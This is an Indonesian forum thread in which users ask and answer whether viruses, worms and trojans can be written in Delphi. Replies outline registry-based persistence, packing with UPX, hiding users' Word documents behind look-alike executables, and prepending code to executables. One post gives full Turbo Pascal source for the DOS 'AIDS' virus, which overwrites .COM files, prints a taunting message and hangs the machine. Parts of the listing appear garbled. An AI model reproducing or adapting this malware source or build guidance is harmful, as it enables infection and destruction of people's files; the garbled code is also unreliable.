Salam! Sebelumnya saya mohon permisi kepada rekan-rekan apabila membaca subject di atas. Bukan maksud untuk berniat jahat, tapi hanya untuk melengkapi proses pembelajaran tentang pengetahuan file-file infektan. Yang menjadi pertanyaan saya selama ini, apakah dengan bahasa pemrograman Delphi, seseorang dapat menciptakan sebuah virus/worm/trojan? Walaupun sedikit yang saya tau, bahwa ukuran file virus jauh lebih kecil dibanding file hasil compile Delphi. Tapi, tentunya bukan berarti file program yang dapat dihasilkan seseorang dengan bahasa pemrograman Delphi tidak dapat beraktifitas seperti virus bukan? Sampai dengan saat ini saya belum menemukan source program tentang cara membuat virus/worm/trojan dengan menggunakan bahasa pemrograman Delphi. Mohon pencerahan dari rekan-rekan yang lebih tau tentang topik ini. Terima kasih. :?

Yang menjadi pertanyaan saya selama ini, apakah dengan bahasa pemrograman Delphi, seseorang dapat menciptakan sebuah virus/worm/trojan? Walaupun sedikit yang saya tau, bahwa ukuran file virus jauh lebih kecil dibanding file hasil compile Delphi.

Jawabnya : BISA. Malah kalo pake delphi jadi lebih bagus dibanding VB (umumnya virus lokal dibuat pake VB), soalnya kan kalo VB sangat bergantung pada library-nya... Kalo kebeneran di PC korban gak ada dll yang dibutuhkan, maka virus akan gagal tereksekusi.. Beda dengan delphi yang mengikutsertakan library-nya, maka dijamin pasti akan jalan di semua PC... Untuk masalah ukuran, kan bisa di compress.. bisa pake UPX atau ASPack.. Sebenernya komponen umum untuk bikin virus tuh gampang banget.. tinggal bikin rutin File (buka, tutup, copy, hapus, attrib) dan Registry (baca, tulis, buat, hapus).. Intinya cukup 2 itu aja..

File dieksekusi -> copy file ke dir windows (misalnya) -> buat registry entry di Run/RunOnce yang menunjuk ke file di dir windows tersebut.

Selesai deh.. anda sudah mebuat virus.. Jangan lupa, yang dimaksud virus itu bukan payload-nya (memunculkan pesan, menghapus file, dsb) tapi kemampuannya untuk mereplikakan dirinya sendiri tanpa sepengetahuan korban...

Salam! Terima kasih ZeAL atas pencerahannya. Tapi jadi muncul pertanyaan baru, baris-baris apa (dari kode Delphi yang kita buat) yang disalinkan ke file yang akan diinfeksi? Sementara, isinya kode sumber program Delphi yang kita buat umumnya berisi perulangan, pengkondisian dan lainnya. Lalu apa yang akan kita infeksi/tularkan ke file-file yang akan menjadi korban? Sekali lagi terima kasih atas pencerahannya! :?

Ada program "menarik" (rootkit) yang dibuat dengan delphi juga (meskipun juga ada assembly): hacker defender, mungkin pernah denger... sourcecodenya ada di sana juga. Kalau tentang menginfeksi file rasanya yang begituan sekarang agak jarang. Ngapain susah-susah ganggu isinya file executable kalau naruh file dengan nama atau icon yang menipu saja nantinya juga diklik oleh usernya :P. Untuk ashfarsadewa kalau mau menginfeksi file executable lain maka anda perlu belajar assembly dan format file executable windows dulu... Meskipun saya juga tidak bisa :P tapi paling tidak garis besarnya seperti ini: Misal program mulai dijalankan di fungsi main(). maka tambahkan potongan program anda di file executable itu, lalu tumpukilah instruksi pertama fungsi main() untuk menjalankan potongan virus anda dulu baru kembali dan menjalankan main() seperti semestinya. Perhatikan bahwa penjelasan barusan sama sekali tidak membahas apa isi "potongan virus" itu (karena ilmu saya tidak sampai sana) :oops:.

ya copy file biasa aja.. untuk virus2 jaman sekarang, biasanya tidak "menempel" ke file korban.. tapi umumnya "menggantikan" file korban.. contoh di virus brontok.. icon virus sama dengan icon ms. word. Ketika virus dijalankan, virus akan men-scan semua folder dan mencari file berekstensi .doc (ms. word document) lalu kemudian virus akan meng-hidden file word asli tersebut, lalu mengkopi seluruh file virus (dirinya sendiri) ke direktori dimana file ms word yang asli berada dan merenamenya menjadi sama dengan file ms word yang asli (tentunya extensionnya tetap berbeda.. File virus akan berekstensi .exe, sedangkan file ms. word akan berekstensi .doc) Jadi bukan perbagian (subroutine/function/perulangan/kondisi) seperti yang lo kira.. Seperti yang gue bilang sebelumnya, virus jaman sekarang UMUMNYA tidak menginfeksi file korban.. umumnya file aslinya kalo gak dihapus paling dihidden atau dipindahkan... Kalo misalnya mau menginfeksi file korban, biasanya akan menempel di awal tubuh file korban.. Coba buka sebuah file exe dengan notepad atau wordpad, nanti keliatan kode mesin sebuah file.. Nah, virus akan menempel di awal/sebelum kode2 tersebut..

VIRUS-HEAD -- VIRUS-TAIL FILE-HEAD -- FILE-TAIL

Jadi ketika file yang terinfeksi dijalankan, eksekusi akan menjalankan virus tersebut... Setelah virus melakukan proses, baru dialihkan ke blok kode file aslinya.. Bahasa gampangnya : "exe didalam exe"

Virus .... ? Hhmmmm ..... musti belajar assembly tuch sebagai alat bantu dalam bercoding .... Gw sendiri sich ga bisa buat seperti itu, masih banyak yang musti di kerjakan .... he .. hehehehehhe ... :D

Salam! Makasih banyak untuk pencerahannya dari rekan semua, khususnya ZeAL (yang dari tadi pagi ngubek2 mulu, thanks! buddy..it's just for knowledge), lmz, and kaka-delphi. Mudah-mudahan informasi-informasi dari rekan semua, bisa aku jadikan referensi. Sekali lagi makaaaassiiiiiih.....! :D

jika agak flash-back di akhir 90-an...virus "indonesia emas" dan "serbu" dibuat dengan menggunakan turbo pascal. walau di dalam sourcenya didominasi inline asm. walau begitu, di jamannya, kedua virus ini termasuk canggih dengan teknik enkripsi dan antidebugging tingkat tinggi. kalo sekarang, yang lokal, worm nobron alias satria dibuat dengan delphi. so jawabannya, ya bisa banget. pembuat virus dengan delphi saat ini hanya tinggal merangkai "puzzle" yang tersebar di internet, tergantung dia mau hasilnya seperti apa. -arp-

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ AIDS Pascal Source Code                                                     ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
{C-}
{U-}
{I-}       { Wont allow a user break, enable IO check }
{ -- Constants --------------------------------------- }
Const
     VirusSize = 13847;    { AIDS's code size }
     Warning   :String[42]     { Warning message }
     = 'This File Has Been Infected By AIDS! HaHa!';
{ -- Type declarations------------------------------------- }
Type
     DTARec    =Record      { Data area for file search }
     DOSnext  :Array of Byte;
                   Attr    : Byte;
                   Ftime,
                   FDate,
                   FLsize,
                   FHsize  : Integer;
                   FullName: Array of Char;
                 End;
Registers    = Record    {Register set used for file search }
   Case Byte of
   1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
   2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
   End;
{ -- Variables--------------------------------------------- }
Var
                               { Memory offset program code }
   ProgramStart : Byte absolute Cseg:$100;
                                          { Infected marker }
   MarkInfected : String[42] absolute Cseg:$180;
   Reg          : Registers;                 { Register set }
   DTA          : DTARec;                       { Data area }
   Buffer       : Array[Byte] of Byte;        { Data buffer }
   TestID       : String[42]; { To recognize infected files }
   UsePath      : String[66];        { Path to search files }
                                    { Lenght of search path }
   UsePathLenght: Byte absolute UsePath;
   Go           : File;                    { File to infect }
   B            : Byte;                              { Used }
   LoopVar      : Integer;  {Will loop forever}
{ -- Program code------------------------------------------ }
Begin
  GetDir(0, UsePath);               { get current directory }
  if Pos('', UsePath) <> UsePathLenght then
    UsePath := UsePath + '';
  UsePath := UsePath + '*.COM';        { Define search mask }
  Reg.AH := $1A;                            { Set data area }
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)]:=#0; { Path must end with#0}
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;          { Set attribute to find ALL files }
  MsDos(Reg);                   { Find first matching entry }
  IF not Odd(Reg.Flags) Then         { If a file found then }
    Repeat
      UsePath := DTA.FullName;
      B := Pos(#0, UsePath);
      If B > 0 then
      Delete(UsePath, B, 255);             { Remove garbage }
      Assign(Go, UsePath);
      Reset(Go);
      If IOresult = 0 Then          { If not IO error then }
      Begin
        BlockRead(Go, Buffer, 2);
        Move(Buffer[$80], TestID, 43);
                      { Test if file already ill(Infected) }
        If TestID <> Warning Then        { If not then ... }
        Begin
          Seek (Go, 0);
                            { Mark file as infected and .. }
          MarkInfected := Warning;
                                               { Infect it }
          BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
          Close(Go);
          Halt;                   {.. and halt the program }
        End;
        Close(Go);
      End;
        { The file has already been infected, search next. }
      Reg.AH := $4F;
      Reg.DS := Seg(DTA);
      Reg.DX := Ofs(DTA);
      MsDos(Reg);
    {  ......................Until no more files are found }
    Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
  Writeln('');                          {Give a lot of smiles}
Writeln('');
Writeln('     

































');
Writeln('     
                            ATTENTION:                             
');
Writeln('      I have been elected to inform you that throughout your process of ');
Writeln('     
 collecting and executing files, you have accidentally Hš›Kä     
');
Writeln('      yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln('     
 be; YES, it CAN be, a ûç–s has infected your system. Now what do 
');
Writeln('      you have to say about that? HAHAHAHA. Have Hš¥ with this one and ');
Writeln('     
                  remember, there is NO cure for                   
');
Writeln('                                                                        ');
Writeln('     
    ÛÛÛÛÛÛÛÛÛÛ     ÛÛÛÛÛÛÛÛÛÛÛÛ    ÛÛÛÛÛÛÛÛÛÛÛ      ÛÛÛÛÛÛÛÛÛÛ     
');
Writeln('        ÛÛÛ±±±±±±ÛÛÛ     ±±±±ÛÛ±±±±±±   ÛÛ±±±±±±±ÛÛÛ    ÛÛÛ±±±±±±±ÛÛ    ');
Writeln('     
   ÛÛ±±      ÛÛ±        ÛÛ±        ÛÛ±       ÛÛ±   ÛÛ±±       ±±   
');
Writeln('        ÛÛ±       ÛÛ±        ÛÛ±        ÛÛ±       ÛÛ±   ÛÛ±             ');
Writeln('     
   ÛÛÛÛÛÛÛÛÛÛÛÛ±        ÛÛ±        ÛÛ±       ÛÛ±   ÛÛÛÛÛÛÛÛÛÛÛÛ    
');
Writeln('        ÛÛ±±±±±±±±ÛÛ±        ÛÛ±        ÛÛ±       ÛÛ±    ±±±±±±±±±ÛÛ±   ');
Writeln('     
   ÛÛ±       ÛÛ±        ÛÛ±        ÛÛ±       ÛÛ±             ÛÛ±   
');
Writeln('        ÛÛ±       ÛÛ±        ÛÛ±        ÛÛ±      ÛÛÛ±   ÛÛ       ÛÛÛ±   ');
Writeln('     
   ÛÛ±       ÛÛ±   ÛÛÛÛÛÛÛÛÛÛÛÛ    ÛÛÛÛÛÛÛÛÛÛÛ±±    ÛÛÛÛÛÛÛÛÛÛ±±   
');
Writeln('         ±±        ±±    ±±±±±±±±±±±±    ±±±±±±±±±±±      ±±±±±±±±±±    ');
Writeln('     
                                                                   
');
Writeln('     

































');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.

yup bisa banget lah! itu di atas salah satu contoh yang di bikin dari pascal moyangnya delphi. NB: buat Moderator klo posting ini di rasa mengganggu delete aja.

OT: itu syntax highlighter apa sebenarnya punyanya C yang dimodif? Kok setiap ada backslash dalam string dianggap escape? Misalnya postingan di atas stringnya dianggap gak selesai-selesai karena isinya cuma backslash aja...